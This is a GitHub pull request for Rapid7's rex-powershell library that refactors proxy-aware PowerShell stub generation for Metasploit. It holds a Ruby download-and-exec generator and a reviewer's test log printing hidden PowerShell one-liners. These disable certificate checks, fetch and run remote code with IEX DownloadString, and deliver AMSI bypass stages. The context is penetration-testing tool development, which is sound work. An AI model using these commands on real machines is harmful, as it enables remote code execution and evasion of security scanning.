rapid7 / rex-powershell

Rex library for dealing with Powershell Scripts

Update proxy aware script generation #41

Closed cdelafuente-r7 closed 1 year ago

cdelafuente-r7 commented 1 year ago

This PR is a simple update to the method responsible for generating the Powershell stub that uses the default system web proxy and credentials. The logic has been extracted and moved to a new method self.proxy_aware. The original method self.proxy_aware_download_and_exec_string now calls it before concatenating the "download and exec" logic.

These changes are needed by this Metasploit PR.

Testing

The easiest way to test this is to follow the steps listed in this PR.
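The refactoring described above, as an added Ruby illustration that is not the rex-powershell library's own code: a minimal generator where the proxy-handling fragment lives in its own method and the download-and-exec method calls it before appending its tail. The method names proxy_aware and proxy_aware_download_and_exec_string come from the PR text; the module name PshStubExample, the var parameter, the input validation and the exact PowerShell emitted are assumptions of this example.

```ruby
# Added example (not rex-powershell code). Demonstrates the split the PR
# describes: proxy_aware emits only the proxy/credential setup for a
# WebClient, and proxy_aware_download_and_exec_string reuses it and then
# concatenates the "download and exec" logic.
module PshStubExample
  # PowerShell variable names must be simple identifiers; anything else
  # could break out of the generated script.
  VAR_RE = /\A[A-Za-z_]\w*\z/.freeze

  # Returns the PowerShell fragment that creates a WebClient in $var and,
  # only when the machine has a proxy configured, points it at the system
  # web proxy with the logged-on user's default credentials.
  def self.proxy_aware(var)
    raise ArgumentError, "bad variable name: #{var.inspect}" unless var =~ VAR_RE

    [
      "$#{var}=New-Object Net.WebClient;",
      # Skip proxy setup entirely on hosts with no configured proxy.
      "if([Net.WebProxy]::GetDefaultProxy().Address -ne $null){",
      "$#{var}.Proxy=[Net.WebRequest]::GetSystemWebProxy();",
      "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;};"
    ].join
  end

  # Builds on proxy_aware: emits the proxy stub first, then appends the
  # download-and-exec tail for url. The URL goes into a single-quoted
  # PowerShell string, so embedded single quotes are doubled.
  def self.proxy_aware_download_and_exec_string(url, var = 'w')
    raise ArgumentError, 'url must be http(s)' unless url =~ %r{\Ahttps?://}i

    ps_url = url.gsub("'", "''")
    proxy_aware(var) + "IEX $#{var}.DownloadString('#{ps_url}');"
  end
end

if __FILE__ == $PROGRAM_NAME
  puts PshStubExample.proxy_aware_download_and_exec_string('https://192.0.2.1:8080/stage')
end
```

Keeping the proxy logic separate means any other stage that must traverse an authenticated corporate proxy (for example a stager delivered before the payload) can reuse the same fragment without dragging the download-and-exec tail along.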

jheysel-r7 commented 1 year ago

This change has fixed the issue previously being seen when testing https://github.com/rapid7/metasploit-framework/pull/17942. Thanks @cdelafuente-r7!

Testing checks out:

msf6 > use  multi/script/web_delivery
[*] Using configured payload windows/x64/exec
msf6 exploit(multi/script/web_delivery) > set payload payload/windows/x64/exec
payload => windows/x64/exec
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set cmd calc.exe
[-] Unknown datastore option: cmd.
msf6 exploit(multi/script/web_delivery) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(multi/script/web_delivery) > set SRVHOST 172.16.199.1
SRVHOST => 172.16.199.1
msf6 exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  172.16.199.1     yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/x64/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       calc.exe         yes       The command string to execute
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

Exploit target:

   Id  Name
   --  ----
   2   PSH

View the full module info with the info, or info -d command.

msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Using URL: https://172.16.199.1:8080/PpsLxPdHAj
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj/s4y1988'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj/l8mjG5uXTteHBoh'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj/5vQTHmZDvYctdwk/1'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj'));
msf6 exploit(multi/script/web_delivery) > [*] 172.16.199.138   web_delivery - Delivering ForceTLS12 command (78 bytes)
[*] 172.16.199.138   web_delivery - Delivering Proxy Aware command (203 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 1/1(1601 bytes)
[*] 172.16.199.138   web_delivery - Powershell command length: 2101
[*] 172.16.199.138   web_delivery - Delivering Payload (2101 bytes)

[Screenshot: 2023-06-12 at 12:56:53 PM]

msf6 exploit(multi/script/web_delivery) > set PSH-AmsiBypassSplit 5
PSH-AmsiBypassSplit => 5
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Using URL: https://172.16.199.1:8080/8PdWHFVF7ZLso
[*] Server started.
[*] Run the following command on the target machine:
msf6 exploit(multi/script/web_delivery) > [*] Splitting bypass protection script in 5 parts
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/JAGui4aIHA'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/XsPNfTP'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/1'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/2'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/3'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/4'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/5'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso'));
[*] 172.16.199.138   web_delivery - Delivering ForceTLS12 command (78 bytes)
[*] 172.16.199.138   web_delivery - Delivering Proxy Aware command (203 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 1/5(751 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 2/5(392 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 3/5(81 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 4/5(30 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 5/5(351 bytes)
[*] 172.16.199.138   web_delivery - Powershell command length: 2069
[*] 172.16.199.138   web_delivery - Delivering Payload (2069 bytes)

[Screenshot: 2023-06-12 at 1:06:31 PM]